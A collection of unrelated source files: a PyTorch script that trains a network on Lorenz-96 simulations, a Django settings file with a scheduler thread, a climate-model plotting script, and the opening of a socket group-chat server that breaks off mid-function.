self._stop.set()
self.queue.put_nowait(self._sentinel)
self._thread.join()
self._thread = None
|
train_10step.py
|
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import torch.distributed as dist
from torch.nn.parallel import DistributedDataParallel as DDP
import sys
import time
import math
import os
import random
import argparse
import numpy as np
torch.manual_seed(0)
class DataSet:
def __init__(self, data, len: int, nobs: int, nobs2: int, k: int):
self.data = data
self.len = len
self.nobs = nobs
self.nobs2 = nobs2
self.k = k
self.nf = nobs2 - nobs + 1
def __len__(self):
return self.len * self.nf
def __getitem__(self, index):
i = int(index/self.nf)
n = index % self.nf
return self.data[i,n:n+self.nobs,:]
def save(fname, state, loss_t, loss_e):
path = fname+".pth"
torch.save(state, path)
np.savez(fname, loss_t, loss_e)
def average_gradients(model, size):
for param in model.parameters():
dist.all_reduce(param.grad.data, op=dist.ReduceOp.SUM)
param.grad.data /= size
def average_loss(loss, size):
dist.all_reduce(loss, op=dist.ReduceOp.SUM)
loss /= size
return loss
def training(myrank, rank_size, k, nobs, nobs2, data_t, data_e, ndata_t, ndata_e, batch_size_t, init, cp, double, debug, fix, nspin):
if debug:
print(myrank, "start training", flush=True)
nf = nobs2 - nobs + 1
nitr = 2
#path_net = "./train_1step_ens200_bsize4000.pth"
#path_net = "./train_1step_ens400_bsize4000.pth"
fname_pre = f"train_10step_ens{ndata_t}_bsize{batch_size_t}_init{init}"
if nspin != 100:
fname_pre = fname_pre + f"_nspin{nspin}"
if cp > 1:
path_net = fname_pre + f"_{cp-1}.pth"
else:
bs = {50: 125, 100: 250, 200: 2000, 400: 4000, 800: 4000}[ndata_t]
if nspin == 100:
path_net = f"./train_1step_ens{ndata_t}_bsize{bs}.pth"
else:
path_net = f"./train_1step_ens{ndata_t}_bsize{bs}_nspin{nspin}.pth"
if myrank==0:
print(f"pth file is {path_net}")
print(f"# of ensembles is {ndata_t}")
print(f"# of batch_size is {batch_size_t}")
print(f"init is {init}")
print(f"checkpoint count is {cp}")
print(f"rank_size is {rank_size}")
print(f"nspin is {nspin}")
if debug:
fname = "test"
else:
fname = fname_pre + f"_{cp}"
max_norm = 0.01
max_grad_norm = 0.01
if debug:
max_epoch = 10
else:
max_epoch = 50000
#max_epoch = 1000
#max_epoch = 500
#max_epoch = 1
batch_size_e = ndata_e * nf
batch_num_t = ndata_t * nf / batch_size_t
batch_num_e = ndata_e * nf / batch_size_e
loader_t = torch.utils.data.DataLoader(data_t, batch_size=batch_size_t//rank_size, shuffle=True)
loader_e = torch.utils.data.DataLoader(data_e, batch_size=batch_size_e//rank_size)
stat = torch.load(path_net)
if debug:
nint = 1
nint2 = 1
else:
nint = 10
nint2 = 500
#nint2 = 1000
if cp > 1:
path = fname_pre + f"_{cp-1}.npz"
npz = np.load(path)
loss_t = npz['arr_0']
loss_e = npz['arr_1']
else:
loss_t = np.zeros(int(max_epoch/nint+1))
loss_e = np.zeros(int(max_epoch/nint+1))
large = 999.9e5
if (cp > 1) and ('min' in stat.keys()):
min0 = stat['min']
else:
min0 = [large, 0, 0]
if (cp > 1) and ('epoch' in stat.keys()):
epoch_min = stat['epoch'] + 1
else:
epoch_min = 0
if torch.cuda.is_available():
device = torch.device(f"cuda:{myrank}")
else:
device = None
import net
net = net.Net(k, nitr, device=device, rank_size=rank_size)
if not init:
net.load_state_dict(stat['net'])
if double:
net = net.double()
if device:
net = net.to(device)
if rank_size > 1 and init:
net = DDP(net, device_ids=[myrank])
criterion = nn.MSELoss()
if init:
lr = 0.01 * batch_size_t / 1000
else:
lr = 0.001 * batch_size_t / 1000
# lr = 0.0002 * batch_size_t / 1000
optimizer = optim.Adam(net.parameters(), lr=lr)
#optimizer = optim.Adam(net.parameters(), lr=0.01)
#optimizer = optim.Adam(net.parameters(), lr=0.0001)
if cp > 1:
optimizer.load_state_dict(stat['opt'])
#scheduler = optim.lr_scheduler.StepLR(optimizer, step_size=1000, gamma=0.99)
scheduler = optim.lr_scheduler.StepLR(optimizer, step_size=1000, gamma=0.9)
if cp > 1:
scheduler.load_state_dict(stat['sch'])
if myrank==0:
print("start training", flush=True)
start = time.time()
min_tmp = large
unchange = 0
min = min0
for epoch in range(epoch_min, max_epoch):
if init:
net.train()
net.drop = True
elif fix:
# net.train()
# net.drop = False
net.eval()
net.drop = True
else:
net.eval()
net.drop = False
running_loss_t = 0.0
for data in loader_t:
#if debug and myrank==0:
# print("forward", epoch, flush=True)
optimizer.zero_grad()
if device:
data = data.to(device)
out = data[:,0,:]
#out.requires_grad = True
#tmp = out
loss = 0.0
lmsg = True
for n in range(nobs-1):
out = net(out)
target = data[:,n+1,:]
norm = criterion(out, target)
loss += norm
norm = norm.item()
#if debug:
# print(epoch, n, norm)
if norm >= max_norm:
if ( epoch > 10000 or debug ) and lmsg:
print("reducing norm", myrank, n, norm, max_norm, flush=True)
lmsg = False
out = target + ( out - target ) * ( max_norm / norm )
#if debug and myrank==0:
# print("backward", epoch, flush=True)
loss.backward()
if rank_size > 1:
#if debug and myrank==0:
# print("all reduce", epoch, flush=True)
if not init:
average_gradients(net, rank_size)
#print(epoch, myrank, loss.item())
loss = average_loss(loss, rank_size)
#if debug and myrank==0:
# print("optimizer", epoch, flush=True)
nn.utils.clip_grad_norm_(net.parameters(), max_grad_norm)
optimizer.step()
running_loss_t += loss.item()
scheduler.step()
if (epoch+1)%nint == 0 or epoch==0:
#print(torch.norm(tmp).item(), torch.norm(tmp.grad).item())
net.eval()
net.drop = False
#if debug and myrank==0:
# print("eval", epoch, flush=True)
with torch.no_grad():
running_loss_e = 0.0
for data in loader_e:
if device:
data = data.to(device)
loss = 0.0
out = data[:,0,:]
for n in range(nobs-1):
out = net(out)
norm = criterion(out, data[:,n+1,:])
loss += norm
#if debug:
# print(epoch, n, norm.item())
running_loss_e += loss.item()
if rank_size > 1:
running_loss_e = average_loss(torch.tensor(running_loss_e, device=device), rank_size).item()
l_t = running_loss_t / ( batch_num_t * (nobs-1) )
l_e = running_loss_e / ( batch_num_e * (nobs-1) )
if myrank == 0:
loss_t[int((epoch+1)/nint)] = l_t
loss_e[int((epoch+1)/nint)] = l_e
if epoch > 0 and l_e < min[0]:
min = [l_e, l_t, epoch+1]
unchange = 0
if myrank == 0:
state = {
'net': net.state_dict(),
'opt': optimizer.state_dict(),
'sch': scheduler.state_dict(),
'epoch': epoch,
'min': min,
'elapse': time.time() - start,
}
save(fname, state, loss_t, loss_e)
if (epoch+1)%(max_epoch/10) == 0 and myrank==0:
st = {
'net': net.state_dict(),
'opt': optimizer.state_dict(),
'sch': scheduler.state_dict(),
'epoch': epoch,
'min': min,
'elapse': time.time() - start,
}
save(fname+"_fin", st, loss_t, loss_e)
if l_e < min_tmp:
min_tmp = l_e
if (epoch+1)%nint2 == 0 or epoch == 0:
if myrank == 0:
print('[%d] lr: %.2e, training: %.6f, eval: %.6f (%.6f, %.6f)' % (epoch + 1, scheduler.get_last_lr()[0], l_t, l_e, min_tmp, min[0]), flush=True)
if min_tmp > min[0]:
unchange += 1
if ( epoch > 10000 and min_tmp > min[0] * 1.5 ) or unchange >= 20:
break
min_tmp = large
if myrank == 0:
state = {
'net': net.state_dict(),
'opt': optimizer.state_dict(),
'sch': scheduler.state_dict(),
'epoch': epoch,
'min': min,
'elapse': time.time() - start,
}
if (cp > 1) and ('elapse' in stat.keys()):
elapse = stat['elapse']
else:
elapse = 0
print("minimam loss: %.6f, %.6f, %d"%(min[0], min[1], min[2]))
print(f"elapsed time: %d sec"%(time.time() - start + elapse))
save(fname+"_fin", state, loss_t, loss_e)
def init_process(myrank, rank_size, k, nobs, nobs2, data_t, data_e, ndata_t, ndata_e, batch_size_t, init, cp, double, debug, fix, nspin):
os.environ["MASTER_ADDR"] = "127.0.0.1"
port = batch_size_t + ndata_t + 10000
if init:
port += 1
if myrank==0:
print("port: ", port)
os.environ["MASTER_PORT"] = f"{port}"
#backend = "gloo"
backend = "nccl"
dist.init_process_group(backend, rank=myrank, world_size=rank_size)
training(myrank, rank_size, k, nobs, nobs2, data_t, data_e, ndata_t, ndata_e, batch_size_t, init, cp, double, debug, fix, nspin)
dist.destroy_process_group()
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("ndata", type=int)
parser.add_argument("batch_size", type=int)
parser.add_argument("init")
parser.add_argument("--nspin", type=int, default=100)
parser.add_argument("--checkpoint", type=int, default=1)
parser.add_argument("-d", "--debug", action="store_true")
parser.add_argument("-f", "--fix", action="store_true")
args = parser.parse_args()
ndata_t = args.ndata
batch_size_t = args.batch_size
init = args.init == "True"
nspin = args.nspin
cp = args.checkpoint
debug = args.debug
fix = args.fix
# args = sys.argv
# argn = len(args)
# if argn==0:
# print("Usage: train_10step.py [ndata] [batch_size] [init] [checkpoint] [-d]")
# exit()
# ndata_t = int(args[1]) if argn>1 else 100
# batch_size_t = int(args[2]) if argn>2 else ndata_t * nf
# init = args[3]=="True" if argn>3 else False
# cp = int(args[4]) if argn>4 else 1
# debug = args[5]=="-d" if argn>5 else False
#ndata_e = 1
ndata_e = 100
nt = 50
nt2 = 100
#nt2 = 200
int_obs = 5
nobs = int(nt/int_obs) + 1
nobs2 = int(nt2/int_obs) + 1
double = False
#double = True
np.random.seed(0)
import lorenz96
k = 40
f = 8.0
dt = 0.01
sigma = 1e-1
model = lorenz96.Lorenz96(k, f, dt)
x0 = model.init(f, 0.01)
#training data
print("prepare training data")
if double:
data_t = np.zeros([ndata_t,nobs2,k], dtype="float64")
else:
data_t = np.zeros([ndata_t,nobs2,k], dtype="float32")
for m in range(ndata_t):
x = x0 + np.random.randn(k) * sigma
# spinup
for n in range(nspin):
x = model.forward(x)
data_t[m,0,:] = x
for n in range(nt2):
x = model.forward(x)
if (n+1)%int_obs == 0:
data_t[m,(n+1)//int_obs,:] = x
# evaluation data
print("prepare evaluation data")
if double:
data_e = np.zeros([ndata_e,nobs2,k], dtype="float64")
else:
data_e = np.zeros([ndata_e,nobs2,k], dtype="float32")
for m in range(ndata_e):
x = x0 + np.random.randn(k) * sigma
# spinup
for n in range(nspin):
x = model.forward(x)
data_e[m,0,:] = x
for n in range(nt2):
x = model.forward(x)
if (n+1)%int_obs == 0:
data_e[m,(n+1)//int_obs,:] = x
rank_size = torch.cuda.device_count()
if rank_size == 1:
data_t = DataSet(data_t, ndata_t, nobs, nobs2, k)
data_e = DataSet(data_e, ndata_e, nobs, nobs2, k)
training(0, 1, k, nobs, nobs2, data_t, data_e, ndata_t, ndata_e, batch_size_t, init, cp, double, debug, fix, nspin)
else:
if ndata_t % rank_size > 0:
print("ndata_t % rank_size is not 0: ", ndata_t, rank_size)
exit()
if ndata_e % rank_size > 0:
print("ndata_e % rank_size is not 0: ", ndata_e, rank_size)
exit()
if batch_size_t % rank_size > 0:
print("batch_size_t % rank_size is not 0: ", batch_size_t, rank_size)
exit()
import torch.multiprocessing as mp
processes = []
lt = ndata_t // rank_size
le = ndata_e // rank_size
mp.set_start_method("spawn")
for myrank in range(rank_size):
data_ts = DataSet(data_t[lt*myrank:lt*(myrank+1)], lt, nobs, nobs2, k)
data_es = DataSet(data_e[le*myrank:le*(myrank+1)], le, nobs, nobs2, k)
p = mp.Process(target=init_process, args=(myrank, rank_size, k, nobs, nobs2, data_ts, data_es, ndata_t, ndata_e, batch_size_t, init, cp, double, debug, fix, nspin))
p.start()
processes.append(p)
for p in processes:
p.join()
|
settings_20210906111200.py
|
"""
Django settings for First_Wish project.
Generated by 'django-admin startproject' using Django 3.2.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.2/ref/settings/
"""
from pathlib import Path
import os
import environ
import threading
import schedule
import time
from First_Wish_Main_App.views import decrease_day_count_and_send_bday_mails
env_path = os.path.join(os.path.dirname(__file__), '../.env')
environ.Env.read_env(env_path)
# schedule.every().day.at("11:00").do(decrease_day_count_and_send_bday_mails)
# ///////////////////////////////SCHEDULE THE ENABLE BUTTON STARTS////////////////////
# Schedule the task at 00:01 everyday
def sayHi():
print("Hi")
schedule.every().day.at("11:12").do(sayHi)
# schedule.every().day.at("01:00").do(delete_task_and_add_store_datewise)
def func():
while True:
print("======Runnning==========")
schedule.run_pending()
time.sleep(1)
t1 = threading.Thread(target=func)
t1.start()
# ///////////////////////////////SCHEDULE THE ENABLE BUTTON ENDS////////////////////
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
templates_path=os.path.join(BASE_DIR,'templates')
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY =os.environ.get('DJANGO_SECRET_KEY')
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'First_Wish_Main_App',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'First_Wish.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [templates_path],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'First_Wish.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.2/howto/static-files/
STATIC_URL = '/static/'
# Default primary key field type
# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
STATIC_ROOT = os.path.join(BASE_DIR, 'staticfiles')
STATICFILES_DIRS = [
os.path.join(BASE_DIR, "static"),
]
|
plot_from_pp_geop_height_tcwv_and_wind_mean_state_diff.py
|
"""
Load pp, plot and save
8km difference
"""
import os, sys
#%matplotlib inline
#%pylab inline
import matplotlib
#matplotlib.use('Agg')
# Must be before importing matplotlib.pyplot or pylab!
from matplotlib import rc
from matplotlib.font_manager import FontProperties
from matplotlib import rcParams
from mpl_toolkits.basemap import Basemap
rc('font', family = 'serif', serif = 'cmr10')
rc('text', usetex=True)
rcParams['text.usetex']=True
rcParams['text.latex.unicode']=True
rcParams['font.family']='serif'
rcParams['font.serif']='cmr10'
import matplotlib.pyplot as plt
#from matplotlib import figure
import matplotlib as mpl
import matplotlib.cm as mpl_cm
import numpy as np
import iris
import iris.coords as coords
import iris.quickplot as qplt
import iris.plot as iplt
import iris.coord_categorisation
import iris.unit as unit
import cartopy.crs as ccrs
import cartopy.io.img_tiles as cimgt
import matplotlib.ticker as mticker
from cartopy.mpl.gridliner import LONGITUDE_FORMATTER, LATITUDE_FORMATTER
import datetime
from mpl_toolkits.basemap import cm
import imp
from textwrap import wrap
import re
import iris.analysis.cartography
import math
from dateutil import tz
#import multiprocessing as mp
import gc
import types
import scipy.interpolate
import pdb
def main():
save_path='/nfs/a90/eepdw/Figures/EMBRACE/'
model_name_convert_title = imp.load_source('util', '/nfs/see-fs-01_users/eepdw/python_scripts/modules/model_name_convert_title.py')
model_name_convert_legend = imp.load_source('util', '/nfs/see-fs-01_users/eepdw/python_scripts/modules/model_name_convert_legend.py')
unrotate = imp.load_source('util', '/nfs/see-fs-01_users/eepdw/python_scripts/modules/unrotate_pole.py')
pp_file_contourf = 'tcwv_mean'
pp_file_contour ='408_on_p_levs_mean'
plot_diag='TCWV'
#plot_diags=['sp_hum']
cb_label='mm'
min_contour=-5.
max_contour=5.
tick_interval=1.
plot_levels = [925]
#experiment_ids = ['dkmbq', 'dklyu']
experiment_ids = ['djzny', 'djznw', 'djznq', 'djzns', 'dklwu', 'dklzq'] # All minus large 2
#Experiment_ids = ['djzny', 'djznq', 'djzns', 'dkjxq', 'dklyu', 'dkmbq', 'dklwu', 'dklzq', 'dkbhu', 'djznu', 'dkhgu' ] # All 12
#experiment_ids = ['djzny', 'djznq', 'djzns', 'dkjxq', 'dklwu', 'dklzq', 'dkbhu',] # All 12
#experiment_ids = ['dkbhu', 'dkjxq']
#experiment_ids = ['dkmbq', 'dklyu', 'djznw', 'djzny', 'djznq', 'djzns', 'dklwu', 'dklzq'] # All minus large 2
#experiment_ids = ['dklyu, dkmgw']
experiment_ids = ['dklyu']
#experiment_ids = ['dklyu']
diff_id='dkmbq'
#min_contour = 0
#max_contour = 3
#tick_interval=0.3
clevs = np.linspace(min_contour, max_contour,16)
#cmap=cm.s3pcpn_l
cmap = plt.cm.RdBu
#ticks = (np.arange(min_contour, max_contour+tick_interval,tick_interval))
pp_file_path = '/nfs/a90/eepdw/Data/EMBRACE/'
degs_crop_top = 1.7
degs_crop_bottom = 2.5
from iris.coord_categorisation import add_categorised_coord
# def add_hour_of_day(cube, coord, name='hour'):
# add_categorised_coord(cube, name, coord,
# lambda coord, x: coord.units.num2date(x).hour)
figprops = dict(figsize=(8,8), dpi=100)
#cmap=cm.s3pcpn_l
un= unit.Unit('hours since 1970-01-01 00:00:00',calendar='gregorian')
dx, dy = 10, 10
divisor=10 # for lat/lon rounding
lon_high = 101.866
lon_low = 64.115
lat_high = 33.
lat_low =-6.79
lon_low_tick=lon_low -(lon_low%divisor)
lon_high_tick=math.ceil(lon_high/divisor)*divisor
lat_low_tick=lat_low - (lat_low%divisor)
lat_high_tick=math.ceil(lat_high/divisor)*divisor
for p_level in plot_levels:
# Set pressure height contour min/max
if p_level == 925:
clev_min = -72.
clev_max = 72.
elif p_level == 850:
clev_min = -72.
clev_max = 72.
elif p_level == 700:
clev_min = -72.
clev_max = 72.
elif p_level == 500:
clev_min = -72.
clev_max = 72.
else:
print 'Contour min/max not set for this pressure level'
# Set potential temperature min/max
if p_level == 925:
clevpt_min = -3.
clevpt_max = 3.
elif p_level == 850:
clevpt_min = -3.
clevpt_max = 3.
elif p_level == 700:
clevpt_min = -3.
clevpt_max = 3.
elif p_level == 500:
clevpt_min = -3.
clevpt_max = 3.
else:
print 'Potential temperature min/max not set for this pressure level'
# Set specific humidity min/max
if p_level == 925:
clevsh_min = -0.0025
clevsh_max = 0.0025
elif p_level == 850:
clevsh_min = -0.0025
clevsh_max = 0.0025
elif p_level == 700:
clevsh_min = -0.0025
clevsh_max = 0.0025
elif p_level == 500:
clevsh_min = -0.0025
clevsh_max = 0.0025
else:
print 'Specific humidity min/max not set for this pressure level'
#clevs_col = np.arange(clev_min, clev_max)
clevs_lin = np.arange(clev_min, clev_max, 4.)
p_level_constraint = iris.Constraint(pressure=p_level)
#for plot_diag in plot_diags:
for experiment_id in experiment_ids:
expmin1 = experiment_id[:-1]
diffmin1 = diff_id[:-1]
pfile = '/nfs/a90/eepdw/Data/EMBRACE/%s/%s/%s_%s.pp' % (expmin1, experiment_id, experiment_id, pp_file_contourf)
pfile_diff = '/nfs/a90/eepdw/Data/EMBRACE/%s/%s/%s_%s.pp' % (diffmin1, diff_id, diff_id, pp_file_contourf)
#pcube_contourf = iris.load_cube(pfile, p_level_constraint)
pcube_contourf = iris.load_cube(pfile)
#pcube_contourf=iris.analysis.maths.multiply(pcube_contourf,3600)
pcube_contourf_diff = iris.load_cube(pfile_diff)
#pcube_contourf_diff=iris.analysis.maths.multiply(pcube_contourf_diff,3600)
#pdb.set_trace()
height_pp_file = '%s_%s.pp' % (experiment_id, pp_file_contour)
height_pfile = '%s%s/%s/%s' % (pp_file_path, expmin1, experiment_id, height_pp_file)
height_pp_file_diff = '%s_%s.pp' % (diff_id, pp_file_contour)
height_pfile_diff = '%s%s/%s/%s' % (pp_file_path, diffmin1, diff_id, height_pp_file_diff)
pcube_contour = iris.load_cube(height_pfile, p_level_constraint)
pcube_contour_diff = iris.load_cube(height_pfile_diff, p_level_constraint)
#pdb.set_trace()
pcube_contourf=pcube_contourf-pcube_contourf_diff
pcube_contour=pcube_contour-pcube_contour_diff
del pcube_contourf_diff, pcube_contour_diff
#pdb.set_trace()
#time_coords = pcube_contourf.coord('time')
#iris.coord_categorisation.add_day_of_year(pcube_contourf, time_coords, name='day_of_year')
#time_coords = pcube_contour.coord('time')
#iris.coord_categorisation.add_day_of_year(pcube_contour, time_coords, name='day_of_year')
fu = '/nfs/a90/eepdw/Data/EMBRACE/%s/%s/%s_30201_mean.pp' \
% (expmin1, experiment_id, experiment_id)
fu_diff = '/nfs/a90/eepdw/Data/EMBRACE/%s/%s/%s_30201_mean.pp' \
% (diffmin1, diff_id, diff_id)
#pdb.set_trace()
u_wind,v_wind = iris.load(fu, p_level_constraint)
u_wind_diff,v_wind_diff = iris.load(fu_diff, p_level_constraint)
u_wind = u_wind - u_wind_diff
v_wind = v_wind - v_wind_diff
del u_wind_diff, v_wind_diff
for t, time_cube in enumerate(pcube_contourf.slices(['grid_latitude', 'grid_longitude'])):
#pdb.set_trace()
#height_cube_slice = pcube_contour.extract(iris.Constraint(day_of_year=time_cube.coord('day_of_year').points))
height_cube_slice = pcube_contour
u_wind_slice = u_wind
v_wind_slice = v_wind
#pdb.set_trace()
# Get time of averagesfor plot title
#h = un.num2date(np.array(time_cube.coord('time').points, dtype=float)[0]).strftime('%d%b')
#Convert to India time
# from_zone = tz.gettz('UTC')
# to_zone = tz.gettz('Asia/Kolkata')
# h_utc = un.num2date(np.array(time_cube.coord('day_of_year').points, dtype=float)[0]).replace(tzinfo=from_zone)
# h_local = h_utc.astimezone(to_zone).strftime('%H%M')
### Winds
cs_w = u_wind_slice.coord_system('CoordSystem')
lat_w = u_wind_slice.coord('grid_latitude').points
lon_w = u_wind_slice.coord('grid_longitude').points
lons_w, lats_w = np.meshgrid(lon_w, lat_w)
lons_w,lats_w = iris.analysis.cartography.unrotate_pole(lons_w,lats_w, cs_w.grid_north_pole_longitude, cs_w.grid_north_pole_latitude)
lon_w=lons_w[0]
lat_w=lats_w[:,0]
### Regrid winds to 2 degree spacing
lat_wind_1deg = np.arange(lat_low,lat_high, 2)
lon_wind_1deg = np.arange(lon_low,lon_high, 2)
#pdb.set_trace()
lons_wi, lats_wi = np.meshgrid(lon_wind_1deg, lat_wind_1deg)
fl_la_lo = (lats_w.flatten(),lons_w.flatten())
p_levs = u_wind_slice.coord('pressure').points
sc = np.searchsorted(p_levs, p_level)
u = scipy.interpolate.griddata(fl_la_lo, u_wind_slice.data.flatten(), (lats_wi, lons_wi), method='linear')
v = scipy.interpolate.griddata(fl_la_lo, v_wind_slice.data.flatten(), (lats_wi, lons_wi), method='linear')
################################### # PLOT ##############################################
fig = plt.figure(**figprops)
#cmap=plt.cm.RdBu_r
ax = plt.axes(projection=ccrs.PlateCarree(), extent=(lon_low,lon_high,lat_low+degs_crop_bottom,lat_high-degs_crop_top))
m =\
Basemap(llcrnrlon=lon_low,llcrnrlat=lat_low,urcrnrlon=lon_high,urcrnrlat=lat_high, rsphere = 6371229)
#pdb.set_trace()
# lat = pcube_contourf.coord('grid_latitude').points
# lon = pcube_contourf.coord('grid_longitude').points
# cs = cube.coord_system('CoordSystem')
# lons, lats = np.meshgrid(lon, lat)
# lons, lats = iris.analysis.cartography.unrotate_pole\
# (lons,lats, cs.grid_north_pole_longitude, cs.grid_north_pole_latitude)
# x,y = m(lons,lats)
#x_w,y_w = m(lons_wi, lats_wi)
if plot_diag=='temp':
min_contour = clevpt_min
max_contour = clevpt_max
cb_label='K'
main_title='8km Explicit model (dklyu) minus 8km parametrised model geopotential height (grey contours), potential temperature (colours),\
and wind (vectors)'
tick_interval=2
clev_number=max_contour-min_contour+1
elif plot_diag=='sp_hum':
min_contour = clevsh_min
max_contour = clevsh_max
cb_label='kg/kg'
main_title='8km Explicit model (dklyu) minus 8km parametrised model geopotential height (grey contours), specific humidity (colours),\
and wind (vectors)'
tick_interval=0.002
clev_number=max_contour-min_contour+0.001
lat = time_cube.coord('grid_latitude').points
lon = time_cube.coord('grid_longitude').points
lons, lats = np.meshgrid(lon, lat)
cs = time_cube.coord_system('CoordSystem')
lons,lats = iris.analysis.cartography.unrotate_pole(lons,lats, cs.grid_north_pole_longitude, cs.grid_north_pole_latitude)
cont = plt.contourf(lons, lats, time_cube.data*-0.01, clevs, cmap=cmap, extend='both')
#cont = plt.contourf(lons, lats, time_cube.data)
#pdb.set_trace()
cs_lin = plt.contour(lons, lats, height_cube_slice.data, clevs_lin,colors='#262626',linewidths=1.)
plt.clabel(cs_lin, fontsize=14, fmt='%d', color='black')
#del time_cube
#plt.clabel(cont, fmt='%d')
#ax.stock_img()
ax.coastlines(resolution='110m', color='#262626')
gl = ax.gridlines(draw_labels=True,linewidth=0.5, color='#262626', alpha=0.5, linestyle='--')
gl.xlabels_top = False
gl.ylabels_right = False
#gl.xlines = False
dx, dy = 10, 10
gl.xlocator = mticker.FixedLocator(range(int(lon_low_tick),int(lon_high_tick)+dx,dx))
gl.ylocator = mticker.FixedLocator(range(int(lat_low_tick),int(lat_high_tick)+dy,dy))
gl.xformatter = LONGITUDE_FORMATTER
gl.yformatter = LATITUDE_FORMATTER
gl.xlabel_style = {'size': 12, 'color':'#262626'}
#gl.xlabel_style = {'color': '#262626', 'weight': 'bold'}
gl.ylabel_style = {'size': 12, 'color':'#262626'}
x_w,y_w = m(lons_wi, lats_wi)
wind = m.quiver(x_w,y_w, u, v,scale=75, color='#262626' )
qk = plt.quiverkey(wind, 0.1, 0.1, 1, '1 m/s', labelpos='W')
cbar = fig.colorbar(cont, orientation='horizontal', pad=0.05, extend='both')
cbar.set_label('%s' % cb_label, fontsize=10, color='#262626')
# cbar.set_label(time_cube.units, fontsize=10, color='#262626')
cbar.set_ticks(np.arange(min_contour, max_contour+tick_interval,tick_interval))
ticks = (np.arange(min_contour, max_contour+tick_interval,tick_interval))
cbar.set_ticklabels(['${%.1f}$' % i for i in ticks])
# cbar.ax.tick_params(labelsize=10, color='#262626')
#main_title='Mean Rainfall for EMBRACE Period -%s UTC (%s IST)' % (h, h_local)
#main_title=time_cube.standard_name.title().replace('_',' ')
#model_info = re.sub(r'[(\']', ' ', model_info)
#model_info = re.sub(r'[\',)]', ' ', model_info)
#print model_info
#file_save_name = '%s_%s_and_%s_%s_hPa_geop_height_and_wind' \
# % (experiment_id, pp_file_contour, pp_file_contourf, p_level)
file_save_name = '%s_minus_%s_%s_and_%s_%s_hPa_geop_height_and_wind' \
% (experiment_id, diff_id, pp_file_contour, pp_file_contourf, p_level)
save_dir = '%s%s/%s_and_%s' % (save_path, experiment_id, pp_file_contour, pp_file_contourf)
if not os.path.exists('%s' % save_dir): os.makedirs('%s' % (save_dir))
#plt.show()
plt.title('%s - %s minus %s' % (plot_diag, str(model_name_convert_legend.main(experiment_id)), str(model_name_convert_legend.main(diff_id))))
#plt.title('%s - %s' % (plot_diag, str(model_name_convert_legend.main(experiment_id))))
fig.savefig('%s/%s.png' % (save_dir, file_save_name), format='png', bbox_inches='tight')
#fig.savefig('%s/%s_short_title.png' % (save_dir, file_save_name) , format='png', bbox_inches='tight')
#plt.show()
#model_info=re.sub('(.{68} )', '\\1\n', str(model_name_convert_title.main(experiment_id)), 0, re.DOTALL)
#plt.title('\n'.join(wrap('%s\n%s' % (main_title, model_info), 1000,replace_whitespace=False)), fontsize=16)
#fig.savefig('%s/%s_%s.png' % (save_dir, file_save_name), format='png', bbox_inches='tight')
fig.clf()
plt.close()
#del time_cube
gc.collect()
if __name__ == '__main__':
main()
#proc=mp.Process(target=worker)
#proc.daemon=True
#proc.start()
#proc.join()
|
server.py
|
import socket
import threading
import pickle
import os
import sys
groups = {}
fileTransferCondition = threading.Condition()
class Group:
def __init__(self,admin,client):
self.admin = admin
self.clients = {}
self.offlineMessages = {}
self.allMembers = set()
self.onlineMembers = set()
self.joinRequests = set()
self.waitClients = {}
self.clients[admin] = client
self.allMembers.add(admin)
self.onlineMembers.add(admin)
def disconnect(self,username):
self.onlineMembers.remove(username)
del self.clients[username]
def connect(self,username,client):
self.onlineMembers.add(username)
self.clients[username] = client
def sendMessage(self,message,username):
for member in self.onlineMembers:
if member != username:
self.clients[member].send(bytes(username + ": " + message,"utf-8"))
def pyconChat(client, username, groupname):
while True:
msg = client.recv(1024).decode("utf-8")
if msg == "/viewRequests":
client.send(b"/viewRequests")
client.recv(1024).decode("utf-8")
if username == groups[groupname].admin:
client.send(b"/sendingData")
client.recv(1024)
client.send(pickle.dumps(groups[groupname].joinRequests))
else:
client.send(b"You're not an admin.")
elif msg == "/approveRequest":
client.send(b"/approveRequest")
client.recv(1024).decode("utf-8")
if username == groups[groupname].admin:
client.send(b"/proceed")
